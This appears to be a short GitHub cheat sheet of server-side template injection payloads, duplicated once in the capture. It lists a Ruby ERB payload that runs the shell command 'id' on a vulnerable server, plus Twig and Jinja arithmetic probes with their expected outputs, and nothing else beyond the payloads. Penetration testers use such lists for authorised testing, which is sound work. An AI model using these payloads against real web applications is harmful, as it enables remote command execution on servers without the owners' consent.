template-injection.md
September 12, 2017 ยท View on GitHub
Template Injection
Ruby
<%=`id`%>
Twig
The following payload should output 49.
{{7*'7'}}
Jinja
This payload should output 7777777.
{{7*'7'}}
September 12, 2017 ยท View on GitHub
Ruby
<%=`id`%>
Twig
The following payload should output 49.
{{7*'7'}}
Jinja
This payload should output 7777777.
{{7*'7'}}